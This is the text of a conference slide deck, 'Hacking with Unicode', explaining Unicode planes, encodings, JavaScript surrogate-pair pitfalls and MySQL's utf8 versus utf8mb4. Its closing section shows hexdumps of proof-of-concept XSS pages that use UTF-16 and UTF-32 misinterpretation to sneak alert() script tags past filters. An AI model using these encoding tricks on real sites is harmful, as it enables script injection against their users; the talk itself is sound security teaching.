Slide 1

Slide 1 text

@mathias · #ruhrsec Hacking with Unicode

Slide 2

Slide 2 text

@mathias

Slide 3

Slide 3 text

1. Unicode 2. Encodings for Unicode 3. Unicode in JavaScript 4. Unicode in MySQL 5. Hacking with Unicode What we’ll cover

Slide 4

Slide 4 text

1. Unicode

Slide 5

Slide 5 text

code point unique name symbol/glyph

Slide 6

Slide 6 text

A LATIN CAPITAL LETTER A U+0041

Slide 7

Slide 7 text

a LATIN SMALL LETTER A U+0061

Slide 8

Slide 8 text

© COPYRIGHT SIGN U+00A9

Slide 9

Slide 9 text

‚ SNOWMAN U+2603

Slide 10

Slide 10 text

PILE OF POO U+1F4A9 !

Slide 11

Slide 11 text

U+000000 → U+10FFFF

Slide 12

Slide 12 text

(0x10FFFF + 1) code points ↓ 17 planes (0xFFFF + 1) code points each

Slide 13

Slide 13 text

Unicode plane #1 U+0000 → U+FFFF Basic Multilingual Plane a.k.a. BMP

Slide 14

Slide 14 text

Unicode planes #2-17 U+010000 → U+10FFFF supplementary planes astral planes

Slide 15

Slide 15 text

2. Encodings

Slide 16

Slide 16 text

Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030 U+000000 – U+00007F 1 2 4 1 1 U+000080 – U+00009F 2 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else U+0000A0 – U+0003FF 2 U+000400 – U+0007FF 3 U+000800 – U+003FFF 3 U+004000 – U+00FFFF 4 U+010000 – U+03FFFF 4 4 4 U+040000 – U+10FFFF 5 Number of bytes per code point

Slide 17

Slide 17 text

Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030 U+000000 – U+00007F 1 2 4 1 1 U+000080 – U+00009F 2 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else U+0000A0 – U+0003FF 2 U+000400 – U+0007FF 3 U+000800 – U+003FFF 3 U+004000 – U+00FFFF 4 U+010000 – U+03FFFF 4 4 4 U+040000 – U+10FFFF 5 Number of bytes per code point

Slide 18

Slide 18 text

3. JavaScript " Unicode https://mths.be/jsu

Slide 19

Slide 19 text

Hexadecimal escape sequences >> '\x41\x42\x43' 'ABC' >> '\xA9 Caf\xE9 XYZ' '© Café XYZ' can be used for U+0000 → U+00FF

Slide 20

Slide 20 text

Unicode escape sequences >> '\u0041\u0042\u0043' 'ABC' >> 'I \u2661 JavaScript!' 'I ὑ JavaScript!' can be used for U+0000 → U+FFFF

Slide 21

Slide 21 text

…what about astral code points?

Slide 22

Slide 22 text

…what about !? *…and other, equally important astral symbols *

Slide 23

Slide 23 text

!

Slide 24

Slide 24 text

Unicode code point escapes >> '\u{41}\u{42}\u{43}' 'ABC' >> '\u{1F4A9}' '!' // U+1F4A9 can be used for U+000000 → U+10FFFF ES6

Slide 25

Slide 25 text

Surrogate pairs >> '\uD83D\uDCA9' '!' // U+1F4A9 can be used for U+010000 → U+10FFFF

Slide 26

Slide 26 text

Surrogate pairs // for astral code points (> 0xFFFF) function getSurrogates(codePoint) { var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800; var low = (codePoint - 0x10000) % 0x400 + 0xDC00; return [ high, low ]; } function getCodePoint(high, low) { var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000; return codePoint; } >> getSurrogates(0x1F4A9); // U+1F4A9 is ! [ 0xD83D, 0xDCA9 ] >> getCodePoint(0xD83D, 0xDCA9); 0x1F4A9 https://mths.be/bed

Slide 27

Slide 27 text

JavaScript string length >> 'A'.length // U+0041 1 >> 'A' == '\u0041' true >> 'B'.length // U+0042 1 >> 'B' == '\u0042' true

Slide 28

Slide 28 text

String length ≠ char count >> '!'.length // U+1D400 2 >> '!' == '\uD835\uDC00' true >> '"'.length // U+1D401 2 >> '"' == '\uD835\uDC01' true

Slide 29

Slide 29 text

String length ≠ char count >> '!'.length // U+1F4A9 2 >> '!' == '\uD83D\uDCA9' true

Slide 30

Slide 30 text

String length ≠ char count >> '!'.length // U+1F4A9 2 >> '!' == '\uD83D\uDCA9' true insert obligatory “number two” joke here

Slide 31

Slide 31 text

Real-world example

Slide 32

Slide 32 text

Real-world example

Slide 33

Slide 33 text

No content

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

String character count function countSymbols(string) { return punycode.ucs2.decode(string).length; } >> countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 https://mths.be/punycode

Slide 36

Slide 36 text

String character count function countSymbols(string) { return Array.from(string).length; } >> countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 ES6

Slide 37

Slide 37 text

String character count function countSymbols(string) { return [...string].length; } >> countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 ES6

Slide 38

Slide 38 text

JavaScript escape sequences http://mths.be/bmf

Slide 39

Slide 39 text

If we’re being pedantic… // it’s actually even more complicated: >> 'mañana' == 'mañana' false

Slide 40

Slide 40 text

If we’re being pedantic… // it’s actually even more complicated: >> 'mañana' == 'mañana' false >> 'ma\xF1ana' == 'man\u0303ana' false >> 'ma\xF1ana'.length 6 >> 'man\u0303ana'.length 7

Slide 41

Slide 41 text

function countSymbolsPedantically(string) { // Unicode Normalization, NFC form: var normalized = string.normalize('NFC'); // Account for astral symbols / surrogates: return Array.from(normalized).length; } >> countSymbolsPedantically('mañana') // U+00F1 6 >> countSymbolsPedantically('mañana') // U+006E + U+0303 6 Unicode normalization http://git.io/unorm ES6

Slide 42

Slide 42 text

Perfect? >> var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ ';

Slide 43

Slide 43 text

Perfect? Nope. → can be ‘fixed’ using epic regex-fu >> var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ '; >> countSymbolsPedantically(zalgo) 116 // not 9

Slide 44

Slide 44 text

Reversing a string in JavaScript // naive solution function reverse(string) { return string.split('').reverse().join(''); }

Slide 45

Slide 45 text

Reversing a string in JavaScript // naive solution function reverse(string) { return string.split('').reverse().join(''); } >> reverse('abc') 'cba'

Slide 46

Slide 46 text

Reversing a string in JavaScript // naive solution function reverse(string) { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam'

Slide 47

Slide 47 text

Reversing a string in JavaScript // naive solution function reverse(string) { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anãnam'

Slide 48

Slide 48 text

Reversing a string in JavaScript // naive solution function reverse(string) { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anãnam' >> reverse('!') // U+1F4A9 '��' '\uDCA9\uD83D' // the surrogate pair for !, in the wrong order

Slide 49

Slide 49 text

“I put my thang down, flip it, and reverse it” — Missy ‘Misdemeanor’ Elliot, 2002

Slide 50

Slide 50 text

Reversing a string in JavaScript // Using the Esrever library var reverse = esrever.reverse; >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anañam' >> reverse('!') // U+1F4A9 '!' https://mths.be/esrever

Slide 51

Slide 51 text

Iterate over all symbols in a string function getSymbols(string) { var length = string.length; var index = -1; var output = []; var character; var charCode; while (++index < length) { character = string.charAt(index); charCode = character.charCodeAt(0); if (charCode >= 0xD800 && charCode <= 0xDBFF) { // note: this doesn’t account for lone high surrogates output.push(character + string.charAt(++index)); } else { output.push(character); } } return output; } var symbols = getSymbols('! '); symbols.forEach(function(symbol) { assert(symbol == '! '); });

Slide 52

Slide 52 text

Iterate over all symbols in a string for (const symbol of '!') { assert(symbol == '!'); } ES6

Slide 53

Slide 53 text

This behavior affects other string methods, too.

Slide 54

Slide 54 text

More string madness •String#fromCharCode •String#charAt •String#substring •String#slice •…anything that involves strings •oh, and regular expressions

Slide 55

Slide 55 text

JavaScript has a Unicode problem https://mths.be/jsu

Slide 56

Slide 56 text

! The Pile of Poo Test™ https://mths.be/jsu

Slide 57

Slide 57 text

! is the new %00

Slide 58

Slide 58 text

4. MySQL " Unicode

Slide 59

Slide 59 text

CREATE TABLE `table_name` ( `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT, `column_name` VARCHAR(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

Slide 60

Slide 60 text

CREATE TABLE `table_name` ( `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT, `column_name` VARCHAR(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;

Slide 61

Slide 61 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)

Slide 62

Slide 62 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)

Slide 63

Slide 63 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)

Slide 64

Slide 64 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)

Slide 65

Slide 65 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec) ✘

Slide 66

Slide 66 text

MySQL’s ✌utf8✌

Slide 67

Slide 67 text

ALTER TABLE `table_name` CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; https://mths.be/utf8mb4

Slide 68

Slide 68 text

ALTER TABLE `table_name` CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; https://mths.be/utf8mb4

Slide 69

Slide 69 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo!bar | +-------------+ 1 row in set (0.00 sec) https://mths.be/utf8mb4

Slide 70

Slide 70 text

mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id = 9001; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo!bar | +-------------+ 1 row in set (0.00 sec) https://mths.be/utf8mb4 ✔

Slide 71

Slide 71 text

5. Hacking with Unicode

Slide 72

Slide 72 text

http://mths.be/brk

Slide 73

Slide 73 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0

Slide 74

Slide 74 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0

Slide 75

Slide 75 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0

Slide 76

Slide 76 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0 (U+3C73 CJK UNIFIED IDEOGRAPH-3C73)

Slide 77

Slide 77 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0 (U+6372 CJK UNIFIED IDEOGRAPH-6372)

Slide 78

Slide 78 text

$ curl -sL https://mths.be/brk | hexdump -C | tail -n 19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS"); <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0 (U+6970 CJK UNIFIED IDEOGRAPH-6970)

Slide 79

Slide 79 text

http://mths.be/brm

Slide 80

Slide 80 text

http://mths.be/brm ∀scriptalert(1)/script

Slide 81

Slide 81 text

$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c

Slide 82

Slide 82 text

$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c

Slide 83

Slide 83 text

$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c ∀ (U+2200 FOR ALL)

Slide 84

Slide 84 text

$ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c (U+3E00 CJK UNIFIED IDEOGRAPH-3E00)

Slide 85

Slide 85 text

